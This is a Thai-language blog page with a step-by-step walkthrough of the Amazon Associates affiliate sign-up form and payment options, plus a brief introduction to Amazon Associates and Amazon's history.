Payee Name กรอกให้ตรงกับบัญชีธนาคารเพราะชื่อนี้โอนเงิน
Address Line 1 ที่อยู่
City เมืองหรืออำเภอ
State, Province or Region จังหวัด
ZIP or Postal Code รหัสไปรษณีย์
Country ประเทศไทย
Phone Number ให้ใส่ +66แล้วตามด้วยเบอร์โทรไม่ต้องมี 0 นำหน้า เช่น +662814478
Who is the main contact for this account? ตอบข้อแรกครับ
"The payee listed above"
เสร็จแล้วคลิ๊ก Next: You Website Profile
5. หน้านี้เป็นข้อมูลเกี่ยวกับเว็บไซต์เราครับ มีดังนี้
What is the name of your website? ชื่อเว็บไซต์ ไม่ใช่ URL เช่น MY iDEA aNd FrEeDoM ZoNe
What is the URL of the website(s) you will use to send traffic to Amazon? ที่อยู่เว็บไซต์ เช่น
http://zone-idea.blogspot.com
What is your website(s) about? เว็บไซต์เราเกี่ยวกับอะไร อธิบายสั้น ๆ นึกไม่ออกเขียนไม่ถูกไปใช้บริการ
http://translate.google.com เขียนภาษาไทยแล้วแปลเป็นอังกฤษครับง่ายดี สำหรับคนไม่รู้
Which of the following topics best describes the topic of your website(s)? เลือกหมวดหมู่ของเว็บไซต์เรา
What type of Amazon items do you intend to list on your website(s)? สินค้าที่เราจะขายตรงกับหมวดหมู่อะไรของ Amazon
How do you drive traffic to your website(s)? ถามว่าเราจะพึ่งทราฟฟิคจากไหน
ที่เหลือเลือกตามผมหรือลองอ่านดูเอาเลยครับ
เสร็จแล้วคลิ๊ก Finish
6. A
mazon จะบอกว่าเราสมัครเรียบร้อยแล้ว ทีนี้ให้เรากดที่ Specify Payment Method Now เพื่อยืนยันวิธีรับเงินครับ
7.
จะให้เราเลือกวิธีการรับเงิน โดยมีแบบดังนี้
7.1 Gift certificate/card
7.2 Direct deposit
7.3 Check แนะนำให้เลือกเป็น Check ครับควรกำหนดขั้นต่ำที่ 1000 ขึ้นไปครับ เวลายอดถึงแล้วค่อยกดเปลี่ยนเป็น Direct deposit อาจสงสัยว่าทำไม่เราไม่เลือก Direct deposit ไปเลย เพราะ ถ้าเลือก Direct deposit มันจะส่งเงินให้เราเมื่อมียอด $10 ขึ้นไป แต่อย่าลืมว่าการรับเงินจากต่างประเทศมีค่าใช้จ่ายครับประมาณ 350 - 500 บาทครับ
เสร็จแล้วคลิกที่ Continue เพื่อเริ่มทำ affiliate กับทาง Amazon ได้เลยครับ
จบวิธีการสมัครแล้วครับ ต่อไปผมจะจะมาสอนวิธีการสมัคร Product Advertising API เพื่อใช้ Amazon Web Services
Posted in
Amazon Associates,
สมัคร Amazon Associates
|
Written on 10:10 PM by ปั้มเงิน Cookie Run
Amazon Associates คืออะไร ผมเชื่อว่าหลายๆท่านคงไม่รู้จักเป็นแน่ งั้นเรามาทำความรู้จักกับเจ้า Amazon Associates กันเลย Amazon Associates เริ่มเปิดตัวเมื่อปี ค.ศ. 1996 โดย Amazon ยักษ์ใหญ่แห่งวงการ eCommerce ของโลก ที่คนทั่วโลกอาจรู้จักกันแค่ว่าว่าเป็นร้านขายหนังสือออนไลน์ที่ใหญ่ที่สุดในโลก แต่แท้จริงแล้ว ปัจจุบัน Amazon มีสินค้ามากมายหลากหลายกลุ่มด้วยกัน เช่นApparel,Toys,Electronics,Movies,Jewelry,Watches และอื่นๆ อีกมายมาย
Amazon.com ก่อตั้งในปี ค.ศ. 1994 โดย
Jeffrey Preston Bezos และเปิดตัวอย่างเป็นทางการในปี ค.ศ. 1995 โดยมีเป้าหมายเป็นร้านขายหนังสือมือสองออนไลน์ที่มีหนังสือกว่า 1 ล้านเล่ม และภายหลังก็เริ่มเปิดรับสมัครสมาชิกเพื่อทำตลาดร่วม โดยใช้ชื่อว่า
Amazon Associates ในปี ค.ศ. 1996 ปัจจุบัน Amazon สำนักงานใหญ่ตั้งอยู่ที่ Beacon Hill, Seattle สหรัสอเมริกา
Posted in
Amazon,
Amazon Associates
|
